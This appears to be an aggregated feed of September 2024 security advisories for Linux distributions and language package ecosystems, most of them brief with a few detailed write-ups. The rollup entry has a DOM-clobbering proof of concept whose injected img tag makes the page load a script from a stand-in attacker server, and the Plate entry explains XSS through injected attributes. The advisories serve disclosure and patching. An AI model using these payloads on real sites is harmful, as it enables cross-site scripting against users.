18.09.2024 10:35:12	suse	[SUSE-SU-2024:3295-1] Security update for gstreamer-plugins-bad (important)	Security update for gstreamer-plugins-bad	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3295-1
18.09.2024 09:39:50	suse	[SUSE-SU-2024:3294-1] Security update for python3 (important)	Security update for python3	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3294-1
18.09.2024 09:39:04	suse	[SUSE-SU-2024:3293-1] Security update for python36 (important)	Security update for python36	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3293-1
18.09.2024 06:35:32	fedora	[FEDORA-2024-37f95ce86b] Fedora 39: chromium (high)	update to 128.0.6613.137 * High CVE-2024-8636: Heap buffer overflow in Skia * High CVE-2024-8637: Use after free in Media Router * High CVE-2024-8638: Type Confusion in V8 * High CVE-2024-8639: Use after free in Autofill	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-37f95ce86b
18.09.2024 21:18:02	rubysec	[RUBYSEC:DEVISE-TWO-FACTOR-2024-8796] Devise-Two-Factor Authentication Uses Insufficient Default OTP Shared Secret Length (medium)	### SummaryUnder the default configuration, Devise-Two-Factor version>= 2.2.0 & < 6.0.0 generate TOTP shared secrets that are 120 bitsinstead of the 128-bit minimum defined by[RFC 4226](https://datatracker.ietf.org/doc/html/rfc4226).Using a shared secret shorter than the minimum to generate amulti-factor authentication code could make it easier for anattacker to guess the shared secret and generate valid TOTP codes.### RemediationDevise-Two-Factor should be upgraded to version v6.0.0 as soonas possible. After upgrading, the length of shared secrets andTOTP URLs generated by the library will increase since the newshared secrets will be longer.If upgrading is not possible, you can override the default`otp_secret_length` attribute in the model when configuring`two_factor_authenticable` and set it to a value of at least26 to ensure newly generated shared secrets are at least128-bits long.After upgrading or implementing the workaround, applicationsusing Devise-Two-Factor may wish to migrate users to the newOTP length to provide increased protection for those accounts.Turning off OTP for users by setting `otp_required_for_login`to false is not recommended since it would leave accountsunprotected. However, you may wish to implement applicationlogic that checks the length of a user's shared secret andprompts users to re-enroll in OTP.### BackgroundDevise-Two-Factor uses [ROTP](https://github.com/mdp/rotp) togenerate shared secrets for TOTP. In ROTP < 5.0.0, the firstargument to the "ROTP::Base32#random_base32" function representedthe number of bytes to read from SecureRandom which were thenreturned as a base32-encoded string. In ROTP 5.1.0, this functionwas changed so that the first argument now represents the lengthof the base32-encoded string returned by the function insteadof the number of bytes to read from SecureRandom resulting ina shorter key being generated for the same input value.(https://github.com/mdp/rotp/commit/c6c24ab894e7c2b1579d45ac82c41454d1e98227).	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DEVISE-TWO-FACTOR-2024-8796
18.09.2024 19:49:03	pypi	[PYSEC-2024-82] mindsdb vulnerability (high)	Deserialization of untrusted data can occur in versions 23.3.2.0 and newer of the MindsDB platform, enabling a maliciously uploaded model to run arbitrary code on the server when interacted with.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-82
18.09.2024 19:49:03	pypi	[PYSEC-2024-83] mindsdb vulnerability (high)	Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsDB platform, enabling a maliciously uploaded ‘inhouse’ model to run arbitrary code on the server when used for a prediction.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-83
18.09.2024 19:49:03	pypi	[PYSEC-2024-84] mindsdb vulnerability (high)	Deserialization of untrusted data can occur in versions 23.10.3.0 and newer of the MindsDB platform, enabling a maliciously uploaded ‘inhouse’ model to run arbitrary code on the server when a ‘describe’ query is run on it.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-84
18.09.2024 19:49:03	pypi	[PYSEC-2024-85] mindsdb vulnerability (high)	Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsDB platform, enabling a maliciously uploaded ‘inhouse’ model to run arbitrary code on the server when using ‘finetune’ on it.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-85
21.09.2024 04:28:01	fedora	[FEDORA-2024-e453a209e9] Fedora 39: python3.12, python3-docs (high)	This is the sixth maintenance release of Python 3.12Python 3.12 is the newest major release of the Python programming language, andit contains many new features and optimizations. 3.12.6 is the latestmaintenance release, containing about 90 bugfixes, build improvements anddocumentation changes since 3.12.5. This is an expedited release to address thefollowing security issues:gh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e453a209e9
21.09.2024 04:28:00	fedora	[FEDORA-2024-527052ab76] Fedora 39: expat (critical)	Rebase to version 2.6.3	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-527052ab76
21.09.2024 04:27:59	fedora	[FEDORA-2024-0ce77b8571] Fedora 39: aardvark-dns (high)	Security fix for CVE-2024-8418	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-0ce77b8571
21.09.2024 03:17:34	fedora	[FEDORA-2024-7d5c1bcc78] Fedora 41: openssl (critical)	Fix CVE-2024-5535: SSL_select_next_proto buffer overread	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7d5c1bcc78
21.09.2024 03:17:14	fedora	[FEDORA-2024-671549e74c] Fedora 41: expat (critical)	Rebase to version 2.6.3	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-671549e74c
21.09.2024 03:17:13	fedora	[FEDORA-2024-30ed35ba86] Fedora 41: aardvark-dns (high)	Security fix for CVE-2024-8418	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-30ed35ba86
20.09.2024 18:16:35	suse	[SUSE-SU-2024:3358-1] Security update for ffmpeg-4 (important)	Security update for ffmpeg-4	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3358-1
20.09.2024 18:13:09	suse	[SUSE-SU-2024:3357-1] Security update for python310 (important)	Security update for python310	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3357-1
21.09.2024 01:07:37	npm	[NPM:GHSA-73RG-F94J-XVHX] Plate allows arbitrary DOM attributes in element.attributes and leaf.attributes (high)	### ImpactOne longstanding feature of Plate is the ability to add custom DOM attributes to any element or leaf using the `attributes` property. These attributes are passed to the node component using the `nodeProps` prop.Note: The `attributes` prop that is typically rendered alongside `nodeProps` is unrelated.```ts[{ type: 'p', attributes: { 'data-my-attribute': 'This will be rendered on the paragraph element' }, children: [{ bold: true, attributes: { 'data-my-attribute': 'This will be rendered on the bold leaf element' }, text: 'Bold text', }],}]``````tsxconst ParagraphElement = ({ attributes, nodeProps, children }) => ( <p {...attributes} {...nodeProps} // Arbitrary DOM attributes are injected here > {children} </p>);const BoldLeaf = ({ attributes, nodeProps, children }) => ( <strong {...attributes} {...nodeProps} // Arbitrary DOM attributes are injected here > {children} </strong>);```It has come to our attention that this feature can be used for malicious purposes, including cross-site scripting (XSS) and information exposure (specifically, users' IP addresses and whether or not they have opened a malicious document).Note that the risk of information exposure via `attributes` is only relevant to applications in which web requests to arbitrary URLs are not ordinarily allowed. Plate editors that allow users to embed images from arbitrary URLs, for example, already carry the risk of leaking users' IP addresses to third parties.All Plate editors using an affected version of `@udecode/plate-core` are vulnerable to these information exposure attacks via the `style` attribute and other attributes that can cause web requests to be sent. In addition, whether or not a Plate editor is vulnerable to cross-site scripting attacks using `attributes` depends on a number of factors. The most likely DOM attributes to be vulnerable are `href` and `src` on links and iframes respectively. Any component that spreads `{...nodeProps}` onto an `<a>` or `<iframe>` element and does not later override `href` or `src` will be vulnerable to XSS.```tsx<a href={sanitizedHref} {...attributes} {...nodeProps} // Definitely vulnerable to XSS since `href` can be overridden>``````tsx<a {...attributes} {...nodeProps} // Probably not vulnerable to XSS via `href` href={sanitizedHref}>``````tsx<a {...attributes} {...nodeProps} // May be vulnerable to XSS via `href` if `href` is sometimes omitted from `sanitizedLinkProps` {...sanitizedLinkProps}>```React does not allow passing a string to event handler props like `onClick`, so these are unlikely (but not impossible) to be vulnerable.The attack surface is larger for users running older browsers, which may be vulnerable to XSS in DOM attributes that are less dangerous (although still vulnerable to information exposure) in modern browsers such as `style` or `background`.Potential attack vectors for delivering malicious Slate content to users include:- Opening a malicious document stored on the server- Pasting a malicious Slate fragment into a document- Receiving malicious Slate operations on a collaborative document### PatchesIn patched versions of Plate, we have disabled `element.attributes` and `leaf.attributes` for most attribute names by default, with some exceptions including `target`, `alt`, `width`, `height`, `colspan` and `rowspan` on the link, image, video, table cell and table header cell plugins.If this is a breaking change for you, you can selectively re-enable `attributes` for certain plugins as follows. Please carefully research and assess the security implications of any attribute you allow, as even seemingly innocuous attributes such as `style` can be used maliciously.#### Plate >= 37For custom plugins, specify the list of allowed attribute names in the `node.dangerouslyAllowAttributes` plugin configuration option.```tsconst ImagePlugin = createPlatePlugin({ key: 'image', node: { isElement: true, isVoid: true, dangerouslyAllowAttributes: ['alt'], },});```To modify an existing plugin, use the `extend` method.```tsconst MyImagePlugin = ImagePlugin.extend({ node: { dangerouslyAllowAttributes: ['alt'], },});```#### Plate < 37Note that the patch has been backported to versions `@udecode/plate-core@21.5.1` and `@udecode/plate-core@36.5.9` only.For custom plugins, specify the list of allowed attribute names in the `dangerouslyAllowAttributes` plugin configuration option.```tsconst createImagePlugin = createPluginFactory({ key: 'image', isElement: true, isVoid: true, dangerouslyAllowAttributes: ['alt'],});```To modify an existing plugin, pass `dangerouslyAllowAttributes` to the plugin factory.```tscreateImagePlugin({ dangerouslyAllowAttributes: ['alt'],});```### WorkaroundsIf you are unable to upgrade to any of the patched versions, you should use a tool like [`patch-package`](https://www.npmjs.com/package/patch-package) or [`yarn patch`](https://yarnpkg.com/cli/patch) to remove the logic from `@udecode/plate-core` that adds `attributes` to `nodeProps`.This logic can be found in the `getRenderNodeProps` function and looks something like this. The entire `if` statment can safely be removed.```ts if (!newProps.nodeProps && attributes) { newProps.nodeProps = attributes; }```After applying the patch, be sure to test its effectiveness by rendering a Slate value containing an `attributes` property on some element.```ts[{ type: 'p', attributes: { 'data-vulnerable': true }, children: [{ text: 'My paragraph' }],}]```If the patch was successful, the `data-vulnerable="true"` attribute should not be present on any DOM element when the Plate editor is rendered in the browser.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-73RG-F94J-XVHX
20.09.2024 17:12:25	suse	[SUSE-SU-2024:3355-1] Security update for libpcap (moderate)	Security update for libpcap	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3355-1
20.09.2024 16:06:18	suse	[SUSE-SU-2024:3354-1] Security update for wpa_supplicant (important)	Security update for wpa_supplicant	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3354-1
20.09.2024 12:32:01	suse	[SUSE-SU-2024:3353-1] Security update for python36 (moderate)	Security update for python36	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3353-1
20.09.2024 10:58:24	suse	[SUSE-SU-2024:3351-1] Security update for python3 (moderate)	Security update for python3	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3351-1
20.09.2024 04:58:18	fedora	[FEDORA-2024-d273b23c67] Fedora 40: chromium (high)	update to 129.0.6668.58 * High CVE-2024-8904: Type Confusion in V8 * Medium CVE-2024-8905: Inappropriate implementation in V8 * Medium CVE-2024-8906: Incorrect security UI in Downloads * Medium CVE-2024-8907: Insufficient data validation in Omnibox * Low CVE-2024-8908: Inappropriate implementation in Autofill * Low CVE-2024-8909: Inappropriate implementation in UI	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-d273b23c67
20.09.2024 21:47:22	rubysec	[RUBYSEC:PUMA-2024-45614] Puma's header normalization allows for client to clobber proxy set headers (medium)	### ImpactClients could clobber values set by intermediate proxies (such asX-Forwarded-For) by providing a underscore version of the sameheader (X-Forwarded_For).Any users trusting headers set by their proxy may be affected.Attackers may be able to downgrade connections to HTTP (non-SSL)or redirect responses, which could cause confidentiality leaksif combined with a separate MITM attack.### Patchesv6.4.3/v5.6.9 now discards any headers using underscores if thenon-underscore version also exists. Effectively, allowing theproxy defined headers to always win.### WorkaroundsNginx has a [underscores_in_headers](https://nginx.org/en/docs/http/ngx_http_core_module.html#underscores_in_headers)configuration variable to discard these headers at the proxy level.Any users that are implicitly trusting the proxy defined headersfor security or availability should immediately cease doing sountil upgraded to the fixed versions.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:PUMA-2024-45614
20.09.2024 15:01:19	almalinux	[ALSA-2024:6837] pcp security update (important)	pcp security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6837
20.09.2024 17:08:36	almalinux	[ALSA-2024:6848] pcp security update (important)	pcp security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6848
20.09.2024 21:47:22	rubysec	[RUBYSEC:GOOGLE-PROTOBUF-2024-7254] protobuf-java has potential Denial of Service issue	### SummaryWhen parsing unknown fields in the Protobuf Java Lite and Full library,a maliciously crafted message can cause a StackOverflow error and leadto a program crash.Reporter: Alexis Challande, Trail of Bits Ecosystem SecurityTeam <ecosystem@trailofbits.com>Affected versions: This issue affects all versions of both the Javafull and lite Protobuf runtimes, as well as Protobuf for Kotlin andJRuby, which themselves use the Java Protobuf runtime.### Severity[CVE-2024-7254](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7254)High CVSS4.0 Score 8.7 (NOTE: there may be a delay in publication)This is a potential Denial of Service. Parsing nested groups as unknownfields with DiscardUnknownFieldsParser or Java Protobuf Lite parser,or against Protobuf map fields, creates unbounded recursions that canbe abused by an attacker.### Proof of ConceptFor reproduction details, please refer to the unit tests (Protobuf Java[LiteTest](https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/lite/src/test/java/com/google/protobuf/LiteTest.java)and [CodedInputStreamTest](https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/core/src/test/java/com/google/protobuf/CodedInputStreamTest.java))that identify the specific inputs that exercise this parsing weakness.### Remediation and MitigationWe have been working diligently to address this issue and have releaseda mitigation that is available now. Please update to the latestavailable versions of the following packages:* protobuf-java (3.25.5, 4.27.5, 4.28.2)* protobuf-javalite (3.25.5, 4.27.5, 4.28.2)* protobuf-kotlin (3.25.5, 4.27.5, 4.28.2)* protobuf-kotlin-lite (3.25.5, 4.27.5, 4.28.2)* com-protobuf [JRuby gem only] (3.25.5, 4.27.5, 4.28.2)	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:GOOGLE-PROTOBUF-2024-7254
20.09.2024 16:13:37	almalinux	[ALSA-2024:6757] libnbd security update (moderate)	libnbd security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6757
20.09.2024 21:08:29	almalinux	[ALSA-2024:6681] firefox security update (important)	firefox security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6681
20.09.2024 21:06:46	almalinux	[ALSA-2024:6683] thunderbird security update (important)	thunderbird security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6683
22.09.2024 05:04:29	fedora	[FEDORA-2024-3d29b1647b] Fedora 39: chromium (high)	update to 129.0.6668.58 * High CVE-2024-8904: Type Confusion in V8 * Medium CVE-2024-8905: Inappropriate implementation in V8 * Medium CVE-2024-8906: Incorrect security UI in Downloads * Medium CVE-2024-8907: Insufficient data validation in Omnibox * Low CVE-2024-8908: Inappropriate implementation in Autofill * Low CVE-2024-8909: Inappropriate implementation in UI	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-3d29b1647b
22.09.2024 05:04:14	fedora	[FEDORA-2024-c94f884440] Fedora 39: less (high)	Security fix for CVE-2024-32487 - less with LESSOPEN mishandles \n in paths	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c94f884440
22.09.2024 03:15:59	fedora	[FEDORA-2024-4b5f3d51ca] Fedora 41: jupyterlab, python-notebook (medium)	Update jupyterlab and python-notebook to fix CVE-2024-43805.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4b5f3d51ca
22.09.2024 03:15:35	fedora	[FEDORA-2024-3ecdf562bf] Fedora 41: openjpeg (medium)	Backport fix for CVE-2023-39327.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-3ecdf562bf
22.09.2024 02:59:39	rubysec	[RUBYSEC:GOOGLE-PROTOBUF-2024-7254] protobuf-java has potential Denial of Service issue (high)	### SummaryWhen parsing unknown fields in the Protobuf Java Lite and Full library,a maliciously crafted message can cause a StackOverflow error and leadto a program crash.Reporter: Alexis Challande, Trail of Bits Ecosystem SecurityTeam <ecosystem@trailofbits.com>Affected versions: This issue affects all versions of both the Javafull and lite Protobuf runtimes, as well as Protobuf for Kotlin andJRuby, which themselves use the Java Protobuf runtime.### Severity[CVE-2024-7254](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7254)High CVSS4.0 Score 8.7 (NOTE: there may be a delay in publication)This is a potential Denial of Service. Parsing nested groups as unknownfields with DiscardUnknownFieldsParser or Java Protobuf Lite parser,or against Protobuf map fields, creates unbounded recursions that canbe abused by an attacker.### Proof of ConceptFor reproduction details, please refer to the unit tests (Protobuf Java[LiteTest](https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/lite/src/test/java/com/google/protobuf/LiteTest.java)and [CodedInputStreamTest](https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/core/src/test/java/com/google/protobuf/CodedInputStreamTest.java))that identify the specific inputs that exercise this parsing weakness.### Remediation and MitigationWe have been working diligently to address this issue and have releaseda mitigation that is available now. Please update to the latestavailable versions of the following packages:* protobuf-java (3.25.5, 4.27.5, 4.28.2)* protobuf-javalite (3.25.5, 4.27.5, 4.28.2)* protobuf-kotlin (3.25.5, 4.27.5, 4.28.2)* protobuf-kotlin-lite (3.25.5, 4.27.5, 4.28.2)* com-protobuf [JRuby gem only] (3.25.5, 4.27.5, 4.28.2)	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:GOOGLE-PROTOBUF-2024-7254
23.09.2024 12:59:41	ubuntu	[USN-7007-2] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7007-2
23.09.2024 04:02:26	fedora	[FEDORA-2024-5cd6011cf7] Fedora 39: openssl (high)	Patch for CVE-2024-6119	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5cd6011cf7
23.09.2024 03:56:48	ubuntu	[USN-6992-2] Firefox regressions	USN-6992-1 caused some minor regressions in Firefox.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6992-2
23.09.2024 03:17:20	fedora	[FEDORA-2024-b85d941d78] Fedora 41: chromium (high)	update to 129.0.6668.58High CVE-2024-8904: Type Confusion in V8Medium CVE-2024-8905: Inappropriate implementation in V8Medium CVE-2024-8906: Incorrect security UI in DownloadsMedium CVE-2024-8907: Insufficient data validation in OmniboxLow CVE-2024-8908: Inappropriate implementation in AutofillLow CVE-2024-8909: Inappropriate implementation in UI	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b85d941d78
23.09.2024 03:16:42	fedora	[FEDORA-2024-5d6c951b0b] Fedora 41: iwd	iwd 2.22:Fix issue with handling the Affinities property.Fix issue with handling ConnectedAccessPoint signal when roaming.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5d6c951b0b
22.09.2024 05:21:47	fedora	[FEDORA-2024-a3a82a256d] Fedora 40: python-jupyterlab-server, jupyterlab, python-notebook (medium)	Update jupyterlab and python-notebook to fix CVE-2024-43805.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a3a82a256d
22.09.2024 13:28:31	rustsec	[RUSTSEC-2024-0374] Segmentation fault due to use of uninitialized memory	When trying to decompress a file using "ouch", we can reach the function "ouch::archive::zip::convert_zip_date_time".In the function, there is a unsafe function, "transmute". Once the "transmute" function is called to convert the type of "month" object,the address of the object is changed to the uninitialized memory region. After that, when other function tries to dereference "month", segmentation fault occurs.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0374
24.09.2024 11:08:46	ubuntu	[USN-7030-1] py7zr vulnerability	py7zr could be made to create arbitrary files when extracting the contentsof a specially crafted 7z archive.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7030-1
24.09.2024 03:00:00	redhat	[RHSA-2024:6961] python3.12 security update (moderate)	Python 3.12 is an accessible, high-level, dynamically typed, interpreted programming language, designed with an emphasis on code readability. It includes an extensive standard library, and has a vast ecosystem of third-party libraries. The python3.12 package provides the "python3.12" executable: the reference interpreter for the Python language, version 3. The majority of its standard library is provided in the python3.12-libs package, which should be installed automatically along with python3.12. The remaining parts of the Python standard library are broken out into the python3.12-tkinter and python3.12-test packages, which may need to be installed separately. Documentation for Python is provided in the python3.12-docs package. Packages containing additional libraries for Python are generally named with the "python3.12-" prefix. For the unversioned "python" executable, see manual page "unversioned-python".Security Fix(es):* python: incorrect IPv4 and IPv6 private ranges (CVE-2024-4032)* cpython: python: email module doesn't properly quotes newlines in email headers, allowing header injection (CVE-2024-6923)* python: cpython: Iterating over a malicious ZIP file may lead to Denial of Service (CVE-2024-8088)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6961
24.09.2024 03:00:00	redhat	[RHSA-2024:6962] python3.11 security update (moderate)	Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: incorrect IPv4 and IPv6 private ranges (CVE-2024-4032)* cpython: python: email module doesn't properly quotes newlines in email headers, allowing header injection (CVE-2024-6923)* python: cpython: From NVD collector (CVE-2024-8088)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6962
24.09.2024 03:00:00	redhat	[RHSA-2024:7001] kernel-rt security update (important)	The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Security Fix(es): CVE-2023-6040 CVE-2024-26595 CVE-2021-46984 CVE-2023-52478 CVE-2023-52476 CVE-2023-52522 CVE-2021-47101 CVE-2021-47097 CVE-2023-52605 CVE-2024-26645 CVE-2024-26665 CVE-2024-26720 CVE-2024-26717 CVE-2024-26769 CVE-2024-26894 CVE-2024-26880 CVE-2024-26855 CVE-2024-26923 CVE-2024-26939 CVE-2024-27013 CVE-2024-27042 CVE-2024-35809 CVE-2023-52683 CVE-2024-35884 CVE-2024-35877 CVE-2024-35944 CVE-2024-35989 CVE-2021-47412 CVE-2021-47393 CVE-2021-47386 CVE-2021-47385 CVE-2021-47384 CVE-2021-47383 CVE-2021-47432 CVE-2021-47352 CVE-2021-47338 CVE-2021-47321 CVE-2021-47289 CVE-2021-47287 CVE-2023-52817 CVE-2023-52840 CVE-2021-47441 CVE-2021-47466 CVE-2021-47455 CVE-2021-47497 CVE-2021-47560 CVE-2021-47527 CVE-2024-36883 CVE-2024-36920 CVE-2024-36902 CVE-2024-36953 CVE-2024-36939 CVE-2024-36901 CVE-2021-47582 CVE-2021-47609 CVE-2024-38619 CVE-2022-48754 CVE-2022-48760 CVE-2024-38581 CVE-2024-38570 CVE-2024-38559 CVE-2024-38558 CVE-2024-37356 CVE-2024-39471 CVE-2024-39499 CVE-2024-39501 CVE-2024-39506 CVE-2024-40904 CVE-2024-40911 CVE-2024-40912 CVE-2024-40929 CVE-2024-40931 CVE-2024-40941 CVE-2024-40954 CVE-2024-40958 CVE-2024-40959 CVE-2024-40960 CVE-2024-40972 CVE-2024-40977 CVE-2024-40978 CVE-2024-40988 CVE-2024-40989 CVE-2024-40995 CVE-2024-40997 CVE-2024-40998 CVE-2024-41005 CVE-2024-40901 CVE-2024-41007 CVE-2024-41008 CVE-2022-48804 CVE-2022-48836 CVE-2022-48866 CVE-2024-41090 CVE-2024-41091 CVE-2024-41012 CVE-2024-41013 CVE-2024-41014 CVE-2024-41035 CVE-2024-41038 CVE-2024-41039 CVE-2024-41040 CVE-2024-41041 CVE-2024-41044 CVE-2024-41055 CVE-2024-41056 CVE-2024-41060 CVE-2024-41071 CVE-2024-41076 CVE-2024-41097 CVE-2024-42084 CVE-2024-42090 CVE-2024-42096 CVE-2024-42114 CVE-2024-42124 CVE-2024-42131 CVE-2024-42152 CVE-2024-42154 CVE-2024-42226 CVE-2024-42228 CVE-2024-42237 CVE-2024-42238 CVE-2024-42240 CVE-2024-42246 CVE-2024-42322 CVE-2024-43871 For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:7001
24.09.2024 01:11:05	npm	[NPM:GHSA-GCX4-MW62-G8WM] DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS (high)	### SummaryA DOM Clobbering vulnerability was discovered in rollup when bundling scripts that use `import.meta.url` or with plugins that emit and reference asset files from code in `cjs`/`umd`/`iife` format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present.It's worth noting that similar issues in other popular bundlers like Webpack ([CVE-2024-43788](https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986)) have been reported, which might serve as a good reference.### Details#### BackgroundsDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:[1] https://scnps.co/papers/sp23_domclob.pdf[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/#### Gadget found in `rollup`A DOM Clobbering vulnerability in `rollup` bundled scripts was identified, particularly when the scripts uses `import.meta` and set output in format of `cjs`/`umd`/`iife`. In such cases, `rollup` replaces meta property with the URL retrieved from `document.currentScript`.https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185However, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the `src` attribute of the attacker-controlled element (e.g., an `img` tag ) is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.### PoCConsidering a website that contains the following `main.js` script, the devloper decides to use the `rollup` to bundle up the program: `rollup main.js --format cjs --file bundle.js`.```var s = document.createElement('script')s.src = import.meta.url + 'extra.js'document.head.append(s)```The output `bundle.js` is shown in the following code snippet.```'use strict';var _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;var s = document.createElement('script');s.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript && False && _documentCurrentScript.src \|\| new URL('bundle.js', document.baseURI).href)) + 'extra.js';document.head.append(s);```Adding the `rollup` bundled script, `bundle.js`, as part of the web page source code, the page could load the `extra.js` file from the attacker's domain, `attacker.controlled.server` due to the introduced gadget during bundling. The attacker only needs to insert an `img` tag with the name attribute set to `currentScript`. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.```<!DOCTYPE html><html><head> <title>rollup Example</title> <!-- Attacker-controlled Script-less HTML Element starts--!> <img name="currentScript" src="https://attacker.controlled.server/"></img> <!-- Attacker-controlled Script-less HTML Element ends--!></head><script type="module" crossorigin src="bundle.js"></script><body></body></html>```### ImpactThis vulnerability can result in cross-site scripting (XSS) attacks on websites that include rollup-bundled files (configured with an output format of `cjs`, `iife`, or `umd` and use `import.meta`) and allow users to inject certain scriptless HTML tags without properly sanitizing the `name` or `id` attributes.### PatchPatching the following two functions with type checking would be effective mitigations against DOM Clobbering attack.```const getRelativeUrlFromDocument = (relativePath: string, umd = false) => getResolveUrl( `'${escapeId(relativePath)}', ${ umd ? `typeof document === 'undefined' ? location.href : ` : '' }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src \|\| document.baseURI` );``````const getUrlFromDocument = (chunkId: string, umd = false) => `${ umd ? `typeof document === 'undefined' ? location.href : ` : '' }(${DOCUMENT_CURRENT_SCRIPT} && ${DOCUMENT_CURRENT_SCRIPT}.tagName.toUpperCase() === 'SCRIPT' &&${DOCUMENT_CURRENT_SCRIPT}.src \|\| new URL('${escapeId( chunkId )}', document.baseURI).href)`;```	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GCX4-MW62-G8WM
